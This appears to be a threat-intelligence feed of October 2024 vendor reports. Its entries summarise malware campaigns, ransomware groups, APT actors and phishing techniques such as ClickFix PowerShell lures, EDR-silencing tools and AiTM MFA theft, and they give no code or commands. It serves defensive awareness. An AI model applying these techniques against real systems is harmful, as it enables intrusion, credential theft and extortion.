Source: https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247512794&idx=1&sn=f41a6a721180828aead94ba761b628bb&chksm=ea6645addd11ccbb0bcc218364f0b2f3e69d66f5df9c96a4b8b9804700b05b6423d89376cb98&scene=178&cur_album_id=1539799351089283075
2024-10-21
Docker_Remote_API_Servers_With_Perfctl_Malware
LOW
Intel Source:
Trend Micro
Intel Name:
Docker_Remote_API_Servers_With_Perfctl_Malware
Date of Scan:
2024-10-21
Impact:
LOW
Summary:
Researchers from Trend Micro have discovered the exploitation of vulnerable Docker Remote API servers to deploy malware called perfctl; the activity includes scanning for exposed servers and executing malicious code. The attack starts with the creation of a Docker container with specific configurations and the running of a payload that creates a malicious script, sets environment variables, and downloads a malicious PHP file. The attackers also employ techniques such as checking for similar processes, creating directories, and using a custom function to download files.
Source: https://www.trendmicro.com/en_us/research/24/j/attackers-target-exposed-docker-remote-api-servers-with-perfctl-.html
2024-10-21
Analysis_of_Latrodectus_Malware_Campaign
MEDIUM
Intel Source:
Forcepoint
Intel Name:
Analysis_of_Latrodectus_Malware_Campaign
Date of Scan:
2024-10-21
Impact:
MEDIUM
Summary:
Researchers at Forcepoint have analyzed the Latrodectus campaign activities, highlighting its use of phishing emails and IcedID infrastructure to target the financial, automotive, and healthcare sectors. The campaign primarily involves compromising email accounts to spread malicious attachments, such as HTML and PDF files, designed for stealth and persistence. This makes detection and eradication challenging. Attackers typically initiate the campaign by sending emails that appear to contain important DocuSign documents, tricking users into clicking a link that redirects them to a malicious URL, and downloading harmful payloads.
Source: https://www.forcepoint.com/blog/x-labs/inside-latrodectus-malware-phishing-campaign
2024-10-18
Analysis_of_Updated_WarmCookie_Infrastructure
LOW
Intel Source:
Hunt.IO
Intel Name:
Analysis_of_Updated_WarmCookie_Infrastructure
Date of Scan:
2024-10-18
Impact:
LOW
Summary:
Hunt.IO researchers have analyzed WarmCookie's updated infrastructure and uncovered key indicators, linked servers, and potential overlaps with other malware, like DarkGate.
Source: https://hunt.io/blog/from-warm-to-burned-shedding-light-on-updated-warmcookie-infrastructure
2024-10-18
Copybara_Technical_Analysis
LOW
Intel Source:
ZScaler
Intel Name:
Copybara_Technical_Analysis
Date of Scan:
2024-10-18
Impact:
LOW
Summary:
Zscaler ThreatLabz recently analyzed a new variant of Copybara, which is an Android malware family that emerged in November 2021. The malware is primarily spread through voice phishing (vishing) attacks, where victims receive instructions over the phone to install the Android malware. This new variant of Copybara has been active since November 2023, and utilizes the MQTT protocol to establish communication with its command-and-control (C2) server. The malware abuses the Accessibility Service feature that is native to Android devices to exert granular control over the infected device. In the background, the malware also proceeds to download phishing pages that imitate popular cryptocurrency exchanges and financial institutions with the use of their logos and application names. These pages are designed to deceive victims into entering their credentials, which can then be stolen by the malware.
Source: https://threatlabz.zscaler.com/blogs/security-research/technical-analysis-copybara
2024-10-18
Vietnamese_Threat_Actor_Hits_Job_Seekers
LOW
Intel Source:
Cyble
Intel Name:
Vietnamese_Threat_Actor_Hits_Job_Seekers
Date of Scan:
2024-10-18
Impact:
LOW
Summary:
Researchers from Cyble have discovered a complex multi-stage malware campaign launched by a Vietnamese threat actor that targets job seekers and digital marketing professionals, especially those working with Meta Ads. The attack begins with a malicious LNK file delivered in phishing emails, which leads to the installation of Quasar RAT and grants the attacker complete control of the system.
Source: https://cyble.com/blog/vietnamese-threat-actors-multi-layered-strategy-on-digital-marketing-professionals/
2024-10-18
Analysis_of_Crypt_Ghouls_Group
LOW
Intel Source:
Securelist
Intel Name:
Analysis_of_Crypt_Ghouls_Group
Date of Scan:
2024-10-18
Impact:
LOW
Summary:
Securelist researchers identified a new ransomware group named "Crypt Ghouls" targeting Russian businesses and government agencies. This group utilizes a range of tools, including Mimikatz, AnyDesk, and PsExec, and employs the ransomware strains LockBit 3.0 and Babuk as their final payloads. Investigations revealed that initial access was often gained through compromised contractor login information via VPN connections, originating from IPs linked to a Russian hosting provider.
Source: https://securelist.com/crypt-ghouls-hacktivists-tools-overlap-analysis/114217/
2024-10-18
The_Beast_Ransomware
MEDIUM
Intel Source:
Cybereason
Intel Name:
The_Beast_Ransomware
Date of Scan:
2024-10-18
Impact:
MEDIUM
Summary:
Cybereason researchers have discovered a RaaS group called Beast Ransomware that has been active since 2022 and targets Windows, Linux, and ESXi systems. Beast uses elliptic-curve and ChaCha20 encryption and customizes its ransomware for different targets. It also deletes system backups to prevent recovery. The ransomware is spread through phishing emails and the exploitation of vulnerabilities, and it can stop services and processes to unlock files prior to encryption.
Source: https://www.cybereason.com/blog/threat-analysis-beast-ransomware
2024-10-18
BeaverTail_Malware
LOW
Intel Source:
Esentire
Intel Name:
BeaverTail_Malware
Date of Scan:
2024-10-18
Impact:
LOW
Summary:
eSentire researchers have investigated an incident in which a developer downloaded a malicious project named nft_marketplace-main from GitHub that contained the BeaverTail malware. The malware downloads a Python executable and related files from a remote server using a cURL command to launch the InvisibleFerret backdoor. The technique is similar to those previously attributed to North Korean threat actors in the campaign known as Contagious Interview. These actors often target software developers, a common focus of North Korean threat actors, through phishing emails or LinkedIn interactions.
Source: https://www.esentire.com/blog/bored-beavertail-yacht-club-a-lazarus-lure
2024-10-17
Cicada3301_The_RaaS_Group
MEDIUM
Intel Source:
Group-IB
Intel Name:
Cicada3301_The_RaaS_Group
Date of Scan:
2024-10-17
Impact:
MEDIUM
Summary:
Researchers at Group-IB have identified a RaaS group called Cicada3301, which first appeared in June 2024. The group primarily targets critical organisations in the USA and the UK. Cicada3301 is written in Rust and targets operating systems such as Windows, Linux, and ESXi, as well as platforms like NAS devices. The group recruits cybercriminals as affiliates and pays them a commission. It uses advanced encryption techniques, ChaCha20 combined with RSA, that allow for both full and partial file encryption. Additionally, the group employs aggressive tactics, shutting down virtual machines, deleting backups, and terminating critical services to maximize disruption.
Source: https://www.group-ib.com/blog/cicada3301/
2024-10-17
Horns_Hooves_Campaign
LOW
Intel Source:
Securelist
Intel Name:
Horns_Hooves_Campaign
Date of Scan:
2024-10-17
Impact:
LOW
Summary:
Securelist researchers have uncovered a campaign called Horns&Hooves that has been active since March 2023. Its primary targets are private users, retailers, and service companies in Russia. The attackers send phishing emails containing ZIP archives with malicious JS files disguised as legitimate documents such as requests for prices or proposals. These emails trick users into downloading and installing NetSupport RAT, a tool that gives attackers full remote access to the victim's computer. Once the attackers gain access, they steal sensitive information or sell the access to other cybercriminals. The campaign is believed to be linked to the known hacking group TA569 based on shared code and configuration files.
Source: https://securelist.ru/horns-n-hooves-campaign-delivering-netsupport-rat/110772/
2024-10-17
Top_Level_Domains_for_Cybersquatting
LOW
Intel Source:
Palo Alto
Intel Name:
Top_Level_Domains_for_Cybersquatting
Date of Scan:
2024-10-17
Impact:
LOW
Summary:
Palo Alto researchers have identified top-level domains (TLDs) used for cybersquatting and redirection. The attackers also added two more domains, .diy and .food, to their Traffic Direction Service (TDS) list. Initially they used the domain choto[.]xyz as the TDS, but they have now shifted to a new domain, choto[.]click, using the same TDS paths.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-17-IOCs-for-TLD-CyberSquatting.txt
2024-10-17
IcePeony_APT_Group
MEDIUM
Intel Source:
Nao-sec
Intel Name:
IcePeony_APT_Group
Date of Scan:
2024-10-17
Impact:
MEDIUM
Summary:
Nao_sec researchers have discovered a newly identified China-linked advanced persistent threat (APT) group called IcePeony that has been active since at least 2023. The group mainly targets government agencies, academic institutions, and political organizations in countries such as India, Mauritius, and Vietnam. Their attacks usually begin with SQL injection, after which they take control of systems by installing webshells and backdoors. They also use a unique malware for IIS servers called IceCache, which enables file transfer, proxy management, and command execution on infected servers. Additionally, they developed a simpler backdoor, Ice Event, for more basic system compromises.
Source: https://nao-sec.org/
2024-10-17
New_Wave_of_Attacks_by_UAT_5647_Targeting_Ukraine
LOW
Intel Source:
Cisco Talos
Intel Name:
New_Wave_of_Attacks_by_UAT_5647_Targeting_Ukraine
Date of Scan:
2024-10-17
Impact:
LOW
Summary:
Cisco Talos researchers have identified a new wave of attacks by the Russian-speaking group UAT-5647, also known as RomCom, which has been targeting Ukrainian government entities and unknown Polish organizations since late 2023. The attacks feature an updated version of RomCom malware, dubbed SingleCamper, which loads directly from the registry into memory and communicates using a loopback address.
Source: https://blog.talosintelligence.com/uat-5647-romcom/
2024-10-17
Diving_Deep_into_APT_C_35
LOW
Intel Source:
360 Advanced Threat Research Institute
Intel Name:
Diving_Deep_into_APT_C_35
Date of Scan:
2024-10-17
Impact:
LOW
Summary:
APT-C-35, also known as Donot, is a South Asian APT group that has been active since 2016, primarily targeting government agencies in Pakistan and neighboring countries to steal sensitive information. Recently, the 360 Advanced Threat Research Institute identified an increase in the group's activities, noting the use of macro documents and vulnerability documents as malicious carriers to deploy a new .NET attack component. This component is rare in previous attacks and is still under development.
Source: https://mp.weixin.qq.com/s?__biz=MzUyMjk4NzExMA==&mid=2247501270&idx=1&sn=203ae98a60ffc172cb9e06a1b95116c6&chksm=f9c1f6dfceb67fc916f29b04e9e63fe81a1f916d575ae8c32250fb954ca9619153ba864e118d&scene=178&cur_album_id=1955835290309230595
2024-10-17
Evolving_Landscape_of_Stealers
LOW
Intel Source:
Cyfirma
Intel Name:
Evolving_Landscape_of_Stealers
Date of Scan:
2024-10-17
Impact:
LOW
Summary:
Cyfirma researchers have examined the evolving malware landscape, particularly focusing on various stealers like Divulge, DedSec, and Duck. These malware variants are often advertised on platforms such as GitHub, where developers may either modify open-source versions or create new ones targeting sensitive information from browsers and games.
Source: https://www.cyfirma.com/research/the-will-of-d-a-deep-dive-into-divulge-stealer-dedsec-stealer-and-duck-stealer/
2024-10-17
ClickFix_Tactic_Targets_Google_Meet_Users
MEDIUM
Intel Source:
Sekoia
Intel Name:
ClickFix_Tactic_Targets_Google_Meet_Users
Date of Scan:
2024-10-17
Impact:
MEDIUM
Summary:
Researchers from Sekoia first observed the ClickFix social engineering technique in May 2024. It uses fraudulent error messages to lure users into running malicious PowerShell scripts that deliver malware such as Matanbuchus and DarkGate. Fake Google Meet pages target both Windows and macOS, evading browser security measures. Sekoia researchers connected this technique to the cybercrime groups Slavic Nation Empire (SNE) and Scamquerteo, which mostly target cryptocurrency and Web3 users.
Source: https://blog.sekoia.io/clickfix-tactic-the-phantom-meet/
2024-10-16
Ukrainian_CERT_Alerts_on_MEDUZASTEALER_Malware
LOW
Intel Source:
CERT-UA
Intel Name:
Ukrainian_CERT_Alerts_on_MEDUZASTEALER_Malware
Date of Scan:
2024-10-16
Impact:
LOW
Summary:
On October 15, 2024, Ukraine's CERT-UA reported suspicious messages from the Telegram account @reserveplusbot, which had previously been associated with Rezerv+ technical support. The messages urged users to install special software and included a ZIP file named RESERVPLUS.zip. However, this archive contained a malicious executable (installer.exe) that, when run, downloaded another executable (install.exe), infecting the system with the MEDUZASTEALER malware. This malware, configured to steal various file types (e.g., .txt, .doc, .pdf) and self-delete, also circumvented software protections by adding its storage directory to Microsoft Defender exclusions using a PowerShell command.
Source: https://cert.gov.ua/article/6281018
2024-10-16
Analyzing_the_Snake_Keylogger
LOW
Intel Source:
Eversinc33
Intel Name:
Analyzing_the_Snake_Keylogger
Date of Scan:
2024-10-16
Impact:
LOW
Summary:
Researchers from Eversinc33 have analyzed a MalwareBazaar sample related to Snake Keylogger, an infostealer, keylogger, and clipboard hijacker that first appeared in 2019 and remains popular. During unpacking, they encountered .NET obfuscation, process injection, and further obfuscation before finally uncovering Snake Keylogger and gaining limited access to the threat actor DopeLord's Telegram bot.
Source: https://eversinc33.com/posts/unpacking-snake-keylogger.html
2024-10-16
The_Growing_Quishing_Threat
LOW
Intel Source:
Sophos
Intel Name:
The_Growing_Quishing_Threat
Date of Scan:
2024-10-16
Impact:
LOW
Summary:
Researchers from Sophos have investigated a campaign known as quishing, in which phishing emails are sent with a QR code embedded in a PDF attachment. The attacker sends spear-phishing emails with PDF attachments containing QR codes to several employees. When employees scan the QR code, they are redirected to a fake Microsoft login page that steals their credentials and MFA tokens. The phishing page uses an Adversary-in-the-Middle (AiTM) technique to capture both the login credentials and MFA tokens in real time, enabling the attacker to bypass MFA. The attackers leverage a Phishing-as-a-Service platform called ONNX Store, which provides the tools and infrastructure for such campaigns.
Source: https://news.sophos.com/en-us/2024/10/16/quishing/
2024-10-16
Linux_FASTCash_Malware_Targets_Payment_Switches
LOW
Intel Source:
Haxrob
Intel Name:
Linux_FASTCash_Malware_Targets_Payment_Switches
Date of Scan:
2024-10-16
Impact:
LOW
Summary:
Haxrob researchers have examined a newly identified Linux variant of the DPRK-attributed FASTCash malware, along with background information on the payment switches used in financial networks. FASTCash specifically targets payment switches in compromised financial networks, enabling unauthorized cash withdrawals from ATMs.
Source: https://doubleagent.net/fastcash-for-linux/
2024-10-16
Ransomware_Abuses_Cloud_Services
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Ransomware_Abuses_Cloud_Services
Date of Scan:
2024-10-16
Impact:
MEDIUM
Summary:
Trend Micro researchers have found that threat actors are leveraging cloud services such as Amazon Web Services (AWS) in their ransomware attacks. The ransomware samples are written in Go and primarily target Windows and macOS. The attackers use Amazon S3 buckets to store stolen data and, at the end of the attack, change the victim's device wallpaper to a LockBit-themed image to mislead victims into believing they have been targeted by LockBit.
Source: https://www.trendmicro.com/en_us/research/24/j/fake-lockbit-real-damage-ransomware-samples-abuse-aws-s3-to-stea.html
2024-10-16
Fake_Online_shopping_Campaign
LOW
Intel Source:
Palo Alto
Intel Name:
Fake_Online_shopping_Campaign
Date of Scan:
2024-10-16
Impact:
LOW
Summary:
Researchers at Palo Alto have discovered a fake shopping campaign that mimics legitimate e-commerce sites. These fraudulent websites, such as Penguin Mall, offer only cryptocurrencies such as Bitcoin (BTC), Ethereum (ETH), and Tether (USDT) as payment options, making it easier for scammers to steal funds. The fake shopping sites can be recognized by broken links, unbelievably enticing deals, and poor-quality content. The scammers have re-registered 18 expired domains with similar names. Additionally, these sites not only trick victims into sending cryptocurrency payments but also offer fake loan applications that ask for sensitive personal information such as passport details.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-14-IOCs-for-fake-shopping-scam-sites.txt
2024-10-16
Stealthy_Phishing_Using_Blob_URLs_Explained
LOW
Intel Source:
ISC.SANS
Intel Name:
Stealthy_Phishing_Using_Blob_URLs_Explained
Date of Scan:
2024-10-16
Impact:
LOW
Summary:
Researchers at SANS have described a phishing attempt encountered in a catch-all mailbox. The email claims that an important document is pending delivery, prompting the victim to authenticate to access it. Notably, the URL starts with "blob:", indicating the use of a browser-specific object URL to obscure the true destination and enhance stealth. This technique allows attackers to generate a landing page without a traditional server, making it harder to detect. If victims provide their credentials, they are further prompted for additional personal information.
Source: https://isc.sans.edu/diary/Phishing+Page+Delivered+Through+a+Blob+URL/31350/
2024-10-16
X_Zigzag_Rat_Threat_to_Windows
LOW
Intel Source:
ThreatMon
Intel Name:
X_Zigzag_Rat_Threat_to_Windows
Date of Scan:
2024-10-16
Impact:
LOW
Summary:
Researchers at ThreatMon have identified a sophisticated malware named X-ZIGZAG RAT on October 5, 2024, specifically targeting Windows systems. Operating entirely in RAM, it evades detection by traditional antivirus software and is capable of stealing sensitive information, executing commands, and capturing screenshots. Notably, it can detect virtual machines and self-terminate to avoid analysis. The malware achieves persistence through the Windows Task Scheduler and is openly available on GitHub, making it accessible to attackers. Its stealth is further enhanced by a self-destruct mechanism.
Source: https://45734016.fs1.hubspotusercontent-na1.net/hubfs/45734016/X-ZIGZAG%20RAT.pdf?__hstc=205617164.4ca88179e9c4de00be257a0ec5f4dee7.1721037753230.1727940935391.1729075378615.11&__hssc=205617164.1.1729075378615&__hsfp=2296146515
2024-10-16
Iranian_Cyber_Group_Targets_Critical_Sectors
MEDIUM
Intel Source:
CISA
Intel Name:
Iranian_Cyber_Group_Targets_Critical_Sectors
Date of Scan:
2024-10-16
Impact:
MEDIUM
Summary:
A joint advisory has been released by the FBI, CISA, NSA, CSE, AFP, and ACSC warning organisations about Iranian threat actors targeting critical infrastructure sectors such as healthcare, government, IT, engineering, and energy. The attackers aim to steal credentials and gather information about victim networks, which they sell to cybercriminals. These threat actors use brute-force techniques such as password spraying and multifactor authentication (MFA) abuse such as push bombing (sending repeated MFA requests to users until they approve one) to compromise user accounts and gain access to organizations. After gaining access, they explore the network to collect more credentials and find other points of access.
Source: https://www.cisa.gov/sites/default/files/2024-10/aa24-290a-iranian-cyber-actors-conduct-brute-force-and-credential-access-activity.pdf
2024-10-15
Detection_of_New_MiyaRat_Malware
MEDIUM
Intel Source:
QiAnXin
Intel Name:
Detection_of_New_MiyaRat_Malware
Date of Scan:
2024-10-15
Impact:
MEDIUM
Summary:
The Qi'anxin Threat Intelligence Center has monitored various APT groups in South Asia and published reports on their activities. Notably, the Bitter organization (APT-Q-37) has relied on outdated techniques such as CHM and LNK payloads while attempting to evolve its methods. This year, the group tried various strategies, including a new malware called MiyaRat, which was successfully detected. MiyaRat, packaged as an MSI file, connects to a C2 server to exfiltrate information such as disk details, machine names, and system versions. It also supports various malicious functions, including command execution and file management.
Source: https://mp.weixin.qq.com/s?__biz=MzI2MDc2MDA4OA==&mid=2247512724&idx=1&sn=38ec4601ee12df8b038639ad4b4020f1&chksm=ea6645e3dd11ccf579a0b7c6242eff2151902ad3f444967659ee83dacd08552de84e5a8f0887&scene=178&cur_album_id=1539799351089283075
2024-10-15
SideWinder_APT_Group
MEDIUM
Intel Source:
Securelist
Intel Name:
SideWinder_APT_Group
Date of Scan:
2024-10-15
Impact:
MEDIUM
Summary:
Securelist researchers have uncovered a threat actor called SideWinder, also known as Rattlesnake, which has been active since 2012. This group primarily targets government and military, logistics, infrastructure, telecommunication, financial, and oil trading companies across South Asia, including Pakistan, Sri Lanka, China, and Nepal. However, the group is expanding its operations to the Middle East and Africa. It also targets diplomatic entities in France, China, India and Indonesia. The group often uses spear phishing with malicious documents such as Word, Excel or ZIP files carrying hidden malware. It uses the spying tool StealerBot, which can capture keystrokes, take screenshots, and steal sensitive information.
Source: https://securelist.com/sidewinder-apt/114089/
2024-10-15
A_Red_Team_Tool_EDRSilencer
LOW
Intel Source:
Trend Micro
Intel Name:
A_Red_Team_Tool_EDRSilencer
Date of Scan:
2024-10-15
Impact:
LOW
Summary:
Researchers at Trend Micro have recently identified EDRSilencer, a red team tool threat actors exploit to disrupt endpoint detection and response (EDR) solutions. Inspired by the closed-source tool FireBlock, EDRSilencer utilizes the Windows Filtering Platform (WFP) to block network communication for EDR processes, hindering their ability to send alerts or telemetry. This evasion technique makes it challenging to detect and eliminate malware.
Source: https://www.trendmicro.com/en_us/research/24/j/edrsilencer-disrupting-endpoint-security-solutions.html
2024-10-15
Horus_Crypter_Spreads_Diverse_Malware_Families
LOW
Intel Source:
Sonicwall
Intel Name:
Horus_Crypter_Spreads_Diverse_Malware_Families
Date of Scan:
2024-10-15
Impact:
LOW
Summary:
The SonicWall researchers have identified a new Fully Un-Detectable (FUD) malware crypter called Horus, which is being used to spread various malware families, including AgentTesla, Remcos, Snake, and NjRat. The infection chain typically involves malicious files distributed as scripts within archive files, with a notable increase in VBE scripts—encoded VBS scripts that can be decoded using specific tools. Upon execution, these VBE scripts download the necessary payloads from a command-and-control (CnC) server, facilitating the spread of the malware.
Source: https://blog.sonicwall.com/en-us/2024/10/horus-protector-part-2-the-new-malware-distribution-service/
2024-10-15
Lumma_Stealer_Intalls_Through_Hijack_Loader
LOW
Intel Source:
Harfanglab
Intel Name:
Lumma_Stealer_Intalls_Through_Hijack_Loader
Date of Scan:
2024-10-15
Impact:
LOW
Summary:
Researchers from HarfangLab have discovered a malware campaign in which attackers are delivering Lumma Stealer malware by using a tool called Hijack Loader. This loader, also known as DOILoader or SHADOWLADDER, first appeared in September 2023. The attackers are using legitimate code-signing certificates to make their malicious files appear genuine. The campaign tricks users with fake CAPTCHA pages on which they are asked to run encoded PowerShell commands. These commands drop a malicious payload hidden in a ZIP file, which decrypts and runs the final stage of Hijack Loader, which in turn downloads Lumma Stealer.
Source: https://harfanglab.io/insidethelab/hijackloader-abusing-genuine-certificates/
2024-10-15
UAC_0050_Threat_Actor_Group
LOW
Intel Source:
CERT-UA
Intel Name:
UAC_0050_Threat_Actor_Group
Date of Scan:
2024-10-15
Impact:
LOW
Summary:
CERT-UA researchers have observed the threat actor group UAC-0050. This group is involved in activities such as cyber espionage, theft of funds, and psychological operations under the name Fire Cells Group. The group targets Ukrainian businesses and entrepreneurs by gaining unauthorized access to accountants' machines through tools such as REMCOS and TEKTONITRMS in order to steal funds. After stealing funds, they often convert the money into cryptocurrency. They have made at least 30 attempts to forge financial payments through remote banking systems, with amounts ranging from tens of thousands to millions, in just one month. Additionally, they spread false messages about threats such as bombings and contract killings as part of their psychological operations.
Source: https://cert.gov.ua/article/6281009
2024-10-15
Ivanti_CSA_Vulnerabilities_Enable_Network_Breach
MEDIUM
Intel Source:
Fortinet
Intel Name:
Ivanti_CSA_Vulnerabilities_Enable_Network_Breach
Date of Scan:
2024-10-15
Impact:
MEDIUM
Summary:
FortiGuard researchers have investigated a recent case where an advanced adversary exploited three vulnerabilities in the Ivanti Cloud Services Appliance (CSA), including two that were previously unknown. During an incident response engagement, researchers discovered that the attacker gained initial access to the victim's network by leveraging CVE-2024-8190 alongside these zero-day vulnerabilities.
Source: https://www.fortinet.com/blog/threat-research/burning-zero-days-suspected-nation-state-adversary-targets-ivanti-csa
2024-10-15
Iranian_Cyber_Group_Exploits_ChatGPT_for_Attacks
LOW
Intel Source:
Open AI
Intel Name:
Iranian_Cyber_Group_Exploits_ChatGPT_for_Attacks
Date of Scan:
2024-10-15
Impact:
LOW
Summary:
OpenAI reported disrupting over 20 cyber and influence operations this year, notably involving Iranian and Chinese state-sponsored hackers. One identified group, CyberAv3ngers, linked to the Iranian Islamic Revolutionary Guard Corps (IRGC), previously targeted industrial control systems in Ireland and the U.S. Instead of sophisticated hacking methods, they exploited systems with default credentials. Their use of ChatGPT focused on reconnaissance, seeking information on vulnerabilities, default credentials, and assistance with coding, including creating scripts for penetration testing and malicious code obfuscation. The group showed particular interest in targets in Jordan and Central Europe.
Source: https://cdn.openai.com/threat-intelligence-reports/influence-and-cyber-operations-an-update_October-2024.pdf
2024-10-14
Phishing_Targets_via_Customized_Login_Pages
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Phishing_Targets_via_Customized_Login_Pages
Date of Scan:
2024-10-14
Impact:
MEDIUM
Summary:
Unit42 researchers have identified a sophisticated phishing operation that creates personalized fake login pages tailored to individual victims based on their email addresses. This system targets a range of sectors, including commercial, educational, government, and nonprofit organizations. While they've traced some of these deceptive login pages back to email attachments, the delivery methods are not confined to email alone.
Source: https://github.com/PaloAltoNetworks/Unit42-timely-threat-intel/blob/main/2024-10-11-IOCs-for-advanced-phishing-activity.txt
2024-10-14
CoreWarrior_Malware
LOW
Intel Source:
SonicWall
Intel Name:
CoreWarrior_Malware
Date of Scan:
2024-10-14
Impact:
LOW
Summary:
SonicWall researchers have examined a new malware called CoreWarrior. This malware is persistent and spreads quickly by creating multiple copies of itself. It also connects to several IP addresses, opens multiple backdoor connections and monitors user activity. When the malware runs, it creates a copy of itself with a random name and uses the command prompt and curl to transfer the data. After each successful data transfer, the malware deletes the old copy and makes a new one. It also gathers information about the system drives and monitors command prompt activity.
Source: https://blog.sonicwall.com/en-us/2024/10/corewarrior-spreader-malware-surge/
2024-10-14
A_Deep_Dive_Into_DarVision_RAT
LOW
Intel Source:
Zscaler
Intel Name:
A_Deep_Dive_Into_DarVision_RAT
Date of Scan:
2024-10-14
Impact:
LOW
Summary:
Zscaler researchers have identified a malware called DarkVision RAT, which first emerged in 2020 and became popular among cybercriminals due to its low cost and advanced features. It allows attackers to perform various malicious activities such as keylogging, taking screenshots, stealing passwords, and executing remote commands. The malware communicates with its control server, steals sensitive information, and disables antivirus. It can also use plugins to add features such as recording audio, accessing the webcam, and even hijacking system processes.
Source: https://www.zscaler.com/blogs/security-research/technical-analysis-darkvision-rat
2024-10-14
Lynx_Ransomware
MEDIUM
Intel Source:
Palo Alto
Intel Name:
Lynx_Ransomware
Date of Scan:
2024-10-14
Impact:
MEDIUM
Summary:
Lynx ransomware, a successor to the previously identified INC ransomware, emerged in July 2024 and has been actively targeting a range of sectors in the U.S. and UK, including retail, real estate, and finance. Sharing significant portions of its source code with INC, Lynx operates on a ransomware-as-a-service (RaaS) model and employs sophisticated double-extortion tactics, exfiltrating victims' data before encryption to increase pressure for ransom payments. Researchers have noted that while Windows samples of Lynx have been observed, Linux variants have yet to be confirmed. The ransomware's delivery mechanisms include phishing emails, malicious downloads, and hacking forums. Lynx encrypts files using AES-128 and Curve25519 algorithms, appending a .lynx extension to encrypted files, and deletes backup partitions to maximize its impact.
Source: https://unit42.paloaltonetworks.com/inc-ransomware-rebrand-to-lynx/
2024-10-14
Telekopye_Targeting_MarketPlace_Users
LOW
Intel Source:
ESET
Intel Name:
Telekopye_Targeting_MarketPlace_Users
Date of Scan:
2024-10-14
Impact:
LOW
Summary:
ESET researchers have discovered a tool called Telekopye which helps cybercriminals target online marketplace users, such as those on Booking.com and Airbnb, to steal their payment card information. The attackers use stolen login credentials from legitimate accommodation providers to send fake messages about payment problems that redirect recipients to fraudulent websites closely mimicking legitimate booking sites. Victims are then tricked into entering their payment card information on these phishing websites. This scam becomes more common during the summer holidays, when people make online reservations.
Source: https://www.welivesecurity.com/en/eset-research/telekopye-hits-new-hunting-ground-hotel-booking-scams/
2024-10-14
Rising_Threat_from_Earth_Simnavaz_in_Gulf_Region
MEDIUM
Intel Source:
Trend Micro
Intel Name:
Rising_Threat_from_Earth_Simnavaz_in_Gulf_Region
Date of Scan:
2024-10-14
Impact:
MEDIUM
Summary:
Trend Micro researchers have reported increased activity from the cyber espionage group Earth Simnavaz (also known as APT34 or OilRig), which is linked to Iranian interests. This group primarily targets the energy sector and critical infrastructure, particularly within the UAE and Gulf region. Their recent tactics include deploying a new backdoor to exfiltrate sensitive credentials from Microsoft Exchange servers, utilizing techniques to extract clear-text passwords, and leveraging the RMM tool ngrok for persistence. Additionally, they have incorporated the exploitation of CVE-2024-30088 for privilege escalation.
Source: https://www.trendmicro.com/en_us/research/24/j/earth-simnavaz-cyberattacks-uae-gulf-regions.html
2024-10-14
Water_Makara_Target_Multiple_Entities_in_Brazil
LOW
Intel Source:
Trend Micro
Intel Name:
Water_Makara_Target_Multiple_Entities_in_Brazil
Date of Scan:
2024-10-14
Impact:
LOW
Summary:
Researchers from Trend Micro have identified a spear phishing campaign in which attackers are targeting retail, manufacturing, and government entities in Brazil. The attackers use fraudulent emails disguised as important tax documents to trick users into downloading malicious ZIP files that contain a hidden script and LNK files; when a user opens these files, they execute malicious commands. The attackers also use JavaScript to connect to the C2 server. The malware used in this campaign is Astaroth, a known banking trojan that steals sensitive information.
Source: https://www.trendmicro.com/en_us/research/24/j/water-makara-uses-obfuscated-javascript-in-spear-phishing-campai.html
2024-10-14
Earth_Baxi_PlugX_Activity
MEDIUM
Intel Source:
Hunt.io
Intel Name:
Earth_Baxi_PlugX_Activity
Date of Scan:
2024-10-14
Impact:
MEDIUM
Summary:
An investigation into malicious infrastructure revealed two distinct networks linked to the threat actors Earth Baxia and PlugX, driven by the analysis of unconventional SSL/TLS certificates and unique HTTP redirects. Earth Baxia, believed to be a China-based group, utilized Cloudflare certificates and self-signed certificates impersonating Microsoft, alongside HTTP 301 redirects to legitimate sites like the FBI and NASA, creating a facade of benign activity. Meanwhile, the PlugX network was identified through certificates containing the "AES" string and HTTP 302 redirects to Google, marked by irregularities in the response headers.
Source: https://hunt.io/blog/unmasking-adversary-infrastructure-how-certificates-and-redirects-exposed-earth-baxia-and-plugx-activity
2024-10-14
Examination_of_Novel_IMEEX_Framework
LOW
Intel Source:
Intezer
Intel Name:
Examination_of_Novel_IMEEX_Framework
Date of Scan:
2024-10-14
Impact:
LOW
Summary:
Researchers at Intezer have analyzed in depth the IMEEX framework, a newly discovered malware targeting Windows systems, delivered as a 64-bit DLL that provides attackers with extensive control over compromised machines. It features capabilities such as executing additional modules, file manipulation, process management, and remote command execution, while also conducting system reconnaissance and relaying critical information to a command-and-control (C2) server. Primarily targeting Djibouti, with a less capable variant observed in Afghanistan, the malware employs advanced techniques to maintain persistence and avoid detection.
Source: https://intezer.com/blog/research/technical-analysis-of-a-novel-imeex-framework/
2024-10-14
Core_Werewolf_Targets_Russian_Government_Entities
LOW
Intel Source:
BI Zone
Intel Name:
Core_Werewolf_Targets_Russian_Government_Entities
Date of Scan:
2024-10-14
Impact:
LOW
Summary:
Researchers at BI.ZONE have observed the activity of the Core Werewolf group, which has been targeting Russian defense entities and critical infrastructure since 2021. In this campaign the attackers are using malware written in the AutoIt language and distributing malicious files through Telegram as well as email. The malware is delivered in password-protected RAR files that contain a decoy PDF together with a malicious AutoIt script and a legitimate interpreter. When the user opens these files, the script runs on the system and collects system information, including the computer's name, user details, and a list of files on the Desktop, then sends it to a C2 server.
Source: https://bi.zone/eng/expertise/blog/ne-budi-likho-core-werewolf-sovershenstvuet-ataki-na-rossiyskie-gosorganizatsii/
2024-10-14
Telekopye_Toolkit_Spreads_Online_Marketplace_Scams
LOW
Intel Source:
ESET Research
Intel Name:
Telekopye_Toolkit_Spreads_Online_Marketplace_Scams
Date of Scan:
2024-10-14
Impact:
LOW
Summary:
ESET researchers have uncovered new insights into Telekopye, a versatile scam toolkit employed by numerous groups to orchestrate online marketplace fraud. Targeting platforms like OLX, Vinted, eBay, and Wallapop, primarily in Europe and North America, Telekopye simplifies the scamming process, requiring little technical expertise from users. It offers features such as automated phishing webpage creation, an interactive multilingual chatbot, and anti-DDoS protection, enabling scammers, referred to as Neanderthals, to defraud individuals, dubbed Mammoths, on a massive scale.
